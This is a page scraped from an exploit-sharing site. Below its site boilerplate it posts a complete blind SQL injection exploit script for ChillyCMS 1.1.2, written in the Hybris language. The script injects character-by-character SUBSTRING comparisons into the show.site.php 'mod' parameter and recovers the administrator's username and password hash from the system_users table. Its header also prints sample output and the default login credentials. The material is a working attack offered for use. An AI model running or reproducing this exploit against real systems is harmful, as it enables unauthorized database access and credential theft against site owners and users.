0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ChillyCMS Blind Sql Injection Vulnerability
=========================================== ChillyCMS Blind Sql Injection Vulnerability =========================================== #!/usr/bin/hybris ################################################################################# # # Exploit Title: ChillyCMS Blind Sql Injection # Author: IHTeam # Software Link: http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9 # Version: 1.1.2 # Tested on: Win/Linux # # # Example: # [simone@simons Advisories]$ hybris chillycms.hy # Searching Username... : # admin # Searching MD5... : # d033e22ae348aeb5660fc2140aec35850c4da997 # # # DEFAULT USERNAME AND PASSWORD: # User: jens # Pass: demo # # Thanks to evilsocket for Hybris # http://www.hybris-lang.org/ ################################################################################# import std.*; query1 = "4/**/AND/**/(SELECT/**/SUBSTRING("; query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char("; chars = [48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f']; usr = ""; password = ""; i=1; println("Searching Username... : "); while(1) { found=false; chrs = 'a' .. 'z'; foreach(char of chrs) { _chrs = toint(char); url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { usr += char; i+=1; found=true; } } if (!found) { break; } } println(usr); i=1; println("Searching MD5... : "); while(1) { found=false; foreach(char of chars.keys()) { url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { password += chars[char]; i+=1; found=true; } } if (!found) { break; } } println(password); println(); # 0day.today [2024-07-05] #